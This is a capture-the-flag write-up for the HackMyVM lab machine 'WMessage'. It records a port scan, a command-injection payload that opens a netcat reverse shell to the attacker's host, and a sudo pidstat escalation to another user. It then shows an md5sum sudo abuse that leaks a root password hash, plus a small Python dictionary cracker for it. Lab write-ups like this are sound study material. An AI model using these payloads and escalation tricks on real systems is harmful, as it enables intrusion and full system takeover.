NOTES ABOUT WMessage

[ 2022-12-01 ] [ HackMyVM / WMessage ]

Status: Rooted
Skills: Port Scanning, Command Injection, Sudo, Hash Cracking
Tools: nmap, nc, python

PORT SCANNING

$ nmap -sCSV -p- 10.0.2.46

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 62:8e:95:58:1e:ee:94:d1:56:0e:e5:51:f5:45:38:43 (RSA)
| 256 45:a8:7e:56:7f:df:b0:83:65:6c:88:68:19:a4:86:6c (ECDSA)
|_ 256 bc:54:24:a6:0a:8b:6d:34:dc:a6:ab:80:98:ee:1f:f7 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
| http-title: Login
|_Requested resource was /login?next=%2F
|_http-server-header: Apache/2.4.54 (Debian)

GETTING IN

Register in website. Run command injecting reverse shell:

!mpstat; nc 10.0.2.15 443 -c sh

ELEVATING PRIVILEGES

$ sudo -l
Matching Defaults entries for www-data on MSG:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on MSG:
(messagemaster) NOPASSWD: /bin/pidstat

$ sudo -u messagemaster /bin/pidstat -e /bin/bash -i

messagemaster@MSG:/$ id
uid=1000(messagemaster) gid=1000(messagemaster) groups=1000(messagemaster),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth)

messagemaster@MSG:/$ cat User.txt
*****************

messagemaster@MSG:/$ sudo -l
Matching Defaults entries for messagemaster on MSG:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User messagemaster may run the following commands on MSG:
(ALL) NOPASSWD: /bin/md5sum


messagemaster@MSG:/$ sudo /bin/md5sum /var/www/ROOTPASS
85c73111b30f9ede8504bb4a4b682f48 /var/www/ROOTPASS

messagemaster@MSG:/$ su root
Password: ****** #cracked md5 hash (Dict: rockyou.txt)

root@MSG:/# id
uid=0(root) gid=0(root) groups=0(root)
root@MSG:/# cd

root@MSG:~# ls -la
-rw-r----- 1 root root 33 Nov 22 12:37 Root.txt

cat Root.txt
*****************


root@MSG:~# init 0

MINIMAL PYTHON SCRIPT FOR MD5 CRACKING WITH DICT:

import hashlib
for l in open("rockyou.txt", encoding="utf-8", errors="ignore"):
if hashlib.md5((l.strip()+"\n").encode()).hexdigest() == "85c73111b30f9ede8504bb4a4b682f48":
print(l)

--- Loaded 765 times ---